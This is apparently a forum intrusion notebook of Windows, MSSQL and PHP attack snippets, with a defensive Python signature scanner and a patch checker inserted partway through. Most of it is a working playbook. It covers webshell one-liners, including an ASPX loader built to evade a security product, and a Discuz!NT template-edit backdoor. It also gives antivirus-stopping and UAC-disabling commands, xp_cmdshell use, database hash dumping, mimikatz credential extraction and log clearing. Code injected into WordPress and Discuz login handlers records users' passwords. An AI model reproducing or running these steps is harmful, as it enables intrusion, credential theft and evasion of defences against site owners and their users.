delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--

SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
Disabling McAfee: // requires SYSTEM privileges; use at or psexec -s cmd.exe
You can upload .com files, e.g. nc.com, to get around McAfee's executable restriction;
net stop mcafeeframework
net stop mcshield
net stop mcafeeengineservice
net stop mctaskmanager
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D

VNCDump.zip (4.76 KB, downloads: 1)
Online password cracking: http://tools88.com/safe/vnc.php
The VNC password can be obtained directly with vncdump, or by querying the Password value under [HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] from the command prompt.
exec master..xp_cmdshell 'net user'
Executing commands in MSSQL.
Query to get the MSSQL password hashes:
select name,password from master.dbo.sysxlogins

backup log dbName with NO_LOG;
backup log dbName with TRUNCATE_ONLY;
DBCC SHRINKDATABASE(dbName);
Shrinking an MSSQL database.

Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
Compresses the file game_db_201107170400.BAK into 1.rar, split into 200 MB volumes.

backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
Backs up the game database to game.bak at the path D:\WebSites\game.com\UpFileList\game.bak.
Key points for penetrating Discuz!NT 3.5:
(1) Visit site-address/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
(2) Open the rss.aspx file, copy <%@ Page Inherits="Discuz.Web.UI.RssPage" %> to a local backup, then replace it with <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
(3) Save.
(4) The one-line backdoor is then at http://somesite.com.cn/tools/rss.aspx with password pass.
d:\rar.exe a -r d:\1.rar d:\website\
Recursively compresses website;
note the path of rar.exe.
<?php
$telok = "0${@eval($_POST[xxoo])}";
$username = "123456";
$userpwd = "123456";
$telhao = "123456";
$telinfo = "123456";
?>
PHP one-liner Trojan inserted where the one-liner is not filtered

Dumping the database when the web server and database server are separated
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
Conditions did not allow writing a full shell, only a one-liner; that is enough to accomplish anything, but it is not very intuitive or convenient, e.g. for dumping the database.
What is used here is the shell client's expert mode (write your own code).
ini_set('display_errors', 1);
set_time_limit(0);
error_reporting(E_ALL);
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
$i = 0;
$tmp = '';
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
    $i = $i+1;
    $tmp .= implode("::", $row)."\n";
    if(!($i%500)){ // write one file per 500 rows
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
        file_put_contents($filename,$tmp);
        $tmp = '';
    }
}
mysql_free_result($result);

// delete after downloading

ini_set('display_errors', 1);
error_reporting(E_ALL);
$i = 0;
while($i<32) {
    $i = $i+1;
    $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
    unlink($filename);
}
httprint: collect OS fingerprints
Scan all ports of 192.168.1.100:
nmap -PN -sT -sV -p0-65535 192.168.1.100
host -t ns www.owasp.org   identifies the name servers and gets DNS information
host -l www.owasp.org ns1.secure.net   attempts a zone transfer for owasp.org
Netcraft DNS search service: http://searchdns.netcraft.com/?host

Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (free registration required)

MSN search: http://search.msn.com  syntax: "ip:x.x.x.x" (without the quotes)

Webhosting info: http://whois.webhosting.info/  syntax: http://whois.webhosting.info/x.x.x.x

DNSstuff: http://www.dnsstuff.com/ (several services available)

http://net-square.com/msnpawn/index.shtml (requires installation)

tomDNS: http://www.tomdns.net/ (some services are still non-public)

SEOlogs.com: http://www.seologs.com/ip-domains.html (reverse IP/domain lookup)
set names gb2312
Importing a database gives the error "Data too long for column 'username' at row 1"; the cause is missing Chinese character support.

MySQL password change
UPDATE mysql.user SET password=PASSWORD("newpass") where user="mysqladmin";
update user set password=PASSWORD('antian365.com') where user='root';
flush privileges;
Advanced PHP one-liner backdoors

Found many advanced PHP one-liner Trojans during intrusions. Recording them so they can be searched for and removed by keyword later.

1.
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
//Caidao (China Chopper) one-liner

2.
$filename=$_GET['xbid'];
include ($filename);
//dangerous include function: compiles any file as PHP and runs it

3.
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
//renames any file

4.
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
//Caidao one-liner

5.
include ($uid);
//dangerous include function: compiles any file as PHP and runs it, via POST

//one-liner inserted into a gif
6. Typical one-liners
Program backdoor code
<?php eval_r($_POST[sb])?>
Program code
<?php @eval_r($_POST[sb])?>
//error-tolerant version
Program code
<?php assert($_POST[sb]);?>
//executes the relevant PHP statements through the lanker one-liner client's expert mode
Program code
<?$_POST['sa']($_POST['sb']);?>
Program code
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
Program code
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
//after using this one, enter the following in the "config" field when setting up the connection in the Caidao one-liner client
Program code
<O>h=@eval_r($_POST[c]);</O>
Program code
<script language="php">@eval_r($_POST[sb])</script>
//one-liner that bypasses a restriction on <?

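The post records these so they can be hunted by keyword later. As an added example that is not part of the original post, here is a Python scanner that turns the patterns above (plus the ASPX/JScript one-liners elsewhere on this page) into regular-expression signatures; the signature names, regexes and the constructed sample fragments are my own.

```python
import re

# Signatures distilled from the one-liners listed above; the names and regexes are this
# example's own, not from the original post. Each is matched one source line at a time.
SIGNATURES = [
    ("superglobal passed to eval/assert",
     re.compile(r"\b(?:eval|assert)\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I)),
    ("regex with /e modifier fed a superglobal as replacement",
     re.compile(r"""['"]/[^'"]*/[a-z]*e[a-z]*['"]\s*,\s*\$_(?:POST|GET|REQUEST|COOKIE)""")),
    ("function name built from concatenated one-char strings",
     re.compile(r'(?:"[a-z_]"\s*\.\s*){3,}"[a-z_]"', re.I)),
    ("superglobal element called as a function",
     re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\[[^\]]+\]\s*\(")),
    ("include/require of a variable path (review manually)",
     re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*\$", re.I)),
    ("PHP inside a <script language=php> tag",
     re.compile(r"<script\s+language\s*=\s*['\"]php['\"]", re.I)),
    ("ASP.NET Assembly.Load of the request body",
     re.compile(r"Assembly\.Load\s*\(\s*Request\.BinaryRead", re.I)),
    ("JScript eval of a request parameter",
     re.compile(r"\beval\s*\(\s*Request\.Item\b", re.I)),
]

def scan_source(source):
    """Return (line_number, signature_name) for every signature hit in one file's text."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in SIGNATURES:
            if pattern.search(line):
                hits.append((lineno, name))
    return hits

def scan_file(path):
    """Read one file leniently (one-liners hide in .gif/.txt too) and scan it."""
    with open(path, encoding="utf-8", errors="ignore") as fh:
        return scan_source(fh.read())

# Constructed sample: fragments modelled on the one-liners above, plus one benign line (9).
SAMPLE = r'''<?php
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
$filename=$_GET['xbid'];
include ($filename);
<?php @eval($_POST[sb])?>
<?$_POST['sa']($_POST['sb']);?>
<script language="php">@eval($_POST[sb])</script>
$title = htmlspecialchars($_POST['title']);
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(8)).CreateInstance("c"); } catch { }%>
<%eval(Request.Item["pass"],"unsafe");%>
'''

if __name__ == "__main__":
    for lineno, name in scan_source(SAMPLE):
        print(f"line {lineno}: {name}")
```

Run scan_file over every file under the web root, not only .php, since the post notes one-liners embedded in gif files; the include/require hit is a prompt for manual review rather than proof of a backdoor.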
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
Detailed usage:
1. Go to the tools directory. psexec \\127.0.0.1 cmd
2. Run mimikatz
3. Run privilege::debug
4. Run inject::process lsass.exe sekurlsa.dll
5. Run @getLogonPasswords
6. The wdigest entry is the password
7. Type exit to quit; do not close the window directly or the system will crash.
http://www.monyer.com/demo/monyerjs/  fairly comprehensive JS decoding site

Automatically find high-risk system patches
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt

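The same check without the temporary file, as an added Python example that is not from the original post: it parses systeminfo output and reports which of the KBs in the command above are absent. The embedded systeminfo excerpt is a constructed sample, not a real host.

```python
import re
import subprocess

# The KB list from the one-liner above.
REQUIRED_KBS = [
    "KB2360937", "KB2478960", "KB2507938", "KB2566454", "KB2646524",
    "KB2645640", "KB2641653", "KB944653", "KB952004", "KB971657",
    "KB2620712", "KB2393802", "KB942831", "KB2503665", "KB2592799",
]

def installed_hotfixes(systeminfo_output):
    """Collect every KB id in systeminfo output; case-insensitive like find /i."""
    return {kb.upper() for kb in re.findall(r"\bKB\d+\b", systeminfo_output, re.I)}

def missing_hotfixes(systeminfo_output, required=REQUIRED_KBS):
    """Return the required KBs that systeminfo does not list, in list order."""
    present = installed_hotfixes(systeminfo_output)
    return [kb for kb in required if kb.upper() not in present]

def check_local_host(required=REQUIRED_KBS):
    """Run systeminfo on this Windows host; no a.txt is written or left behind."""
    out = subprocess.run(["systeminfo"], capture_output=True, text=True, check=True).stdout
    return missing_hotfixes(out, required)

# Constructed sample of the relevant part of systeminfo output (not a real host).
SAMPLE_SYSTEMINFO = """\
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2478960
                           [02]: kb942831
                           [03]: KB2592799
"""

if __name__ == "__main__":
    for kb in missing_hotfixes(SAMPLE_SYSTEMINFO):
        print(f"{kb} Not Installed!")
```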
ASPX one-liner backdoor that gets past Safedog
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
Logging WordPress login passwords from a webshell
Record WordPress login passwords under a webshell to make further social engineering easier
Add at line 539 of wp-login.php:
// log password
$log_user=$_POST['log'];
$log_pwd=$_POST['pwd'];
$log_ip=$_SERVER["REMOTE_ADDR"];
$txt=$log_user.'|'.$log_pwd.'|'.$log_ip;
$txt=$txt."\r\n";
if($log_user&&$log_pwd&&$log_ip){
@fwrite(fopen('pwd.txt',"a+"),$txt);
}
The password-logging code fires when action=login; you can also put it in the default branch of the switch...case statement.
Just search for case 'login' and insert it right below; the logged passwords are written to pwd.txt.
Actually modifying wp-login.php is not a good approach, as it is easily noticed. There are other methods; noting this one for the record.
Using the IIS6 file parsing vulnerability to get past Safedog:
;antian365.asp;antian365.jpg

Grabbing hashes from various databases to crack the highest-privilege password!
1. SQL Server 2000
SELECT password from master.dbo.sysxlogins where name='sa'
0x010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503412FD54D6119FFF04129A1D72E7C3194F7284A7F3A

0x0100 - constant header
34767D5C - salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341 - case sensitive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A - upper case hash
crack the upper case hash in 'cain and abel' and then work the case sensitive hash
SQL server 2005:-
SELECT password_hash FROM sys.sql_logins where name='sa'
0x0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0x0100 - constant header
993BF231 - salt
5F36CC441485B35C4D84687DC02C78B0E680411F - case sensitive hash
crack case sensitive hash in cain, try brute force and dictionary based attacks.
update:- following bernardo's comments:-
use function fn_varbintohexstr() to cast password in a hex string.
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password) from sysxlogins

MYSQL:-

In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL's own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.

*mysql < 4.1

mysql> SELECT PASSWORD('mypass');
+--------------------+
| PASSWORD('mypass') |
+--------------------+
| 6f8c114b58f2ce9e   |
+--------------------+

*mysql >= 4.1

mysql> SELECT PASSWORD('mypass');
+-------------------------------------------+
| PASSWORD('mypass')                        |
+-------------------------------------------+
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+-------------------------------------------+

Select user, password from mysql.user
The hashes can be cracked in 'cain and abel'

Postgres:-
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called "postgres" or "pgsql")
select usename, passwd from pg_shadow;
 usename  | passwd
----------+-------------------------------------
 testuser | md5fabb6d7172aadfda4753bf0507ed4396
use mdcrack to crack these hashes:-
$ wine MDCrack-sse.exe --algorithm=MD5 --append=testuser fabb6d7172aadfda4753bf0507ed4396

Oracle:-
select name, password, spare4 from sys.user$
hashes could be cracked using 'cain and abel' or thc-orakelcrackert11g
More on Oracle later, I am a bit bored....

Enabling xp_cmdshell in SQL Server 2005/2008
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO
SQL Server 2008 log clearing; always back up before clearing.
If SQL Express 2008 is installed on Windows Server 2008 Standard, delete this file:
X:\Users\[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin

For versions before SQL Server 2008:
SQL Server 2005:
Delete X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
SQL Server 2000:
Clear the relevant entries under the registry key HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\.

This post was last edited by simeon on 2013-1-3 09:51

Windows 2008 file permission changes
1. http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
2. http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
I. First check whether the right-click menu has "管理员取得所有权" (Take ownership as administrator); if it does not, import the following .reg file:

Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\*\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\*\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"

[HKEY_CLASSES_ROOT\Directory\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"

Import this .reg to add the Win7 right-click "Take ownership as administrator" entry
II. Search for "notepad.exe" under C:\Windows; you should find four "notepad.exe" and four "notepad.exe.mui" files.
1. The "notepad.exe" in C:\Windows does not need replacing
2. The "notepad.exe" in C:\Windows\System32 does not need replacing
3. Ignore the four "notepad.exe.mui" files
4. Mainly replace the "notepad.exe" under the two folders C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4 and
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a
Replacement method: first take ownership of these two folders as administrator, then rename "Notepad2.exe" to "notepad.exe" and copy it into both folders.
After replacing, go back to the desktop, create a new txt file and open it to see whether it has changed.
Disabling the security policy (UAC) in Windows 2008:
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Modify client.php in the uc_client directory: below
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
insert the code below; csslog.php is then generated automatically in the site's ./data/cache/ directory.
You can add a view.php under the ipdata directory to view the records; password: falw
if(getenv('HTTP_CLIENT_IP')) {
    $onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
    $onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR')) {
    $onlineip = getenv('REMOTE_ADDR');
} else {
    $onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
}
$showtime=date("Y-m-d H:i:s");
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
$handle=fopen('./data/cache/csslog.php','a+');
$write=fwrite($handle,$record);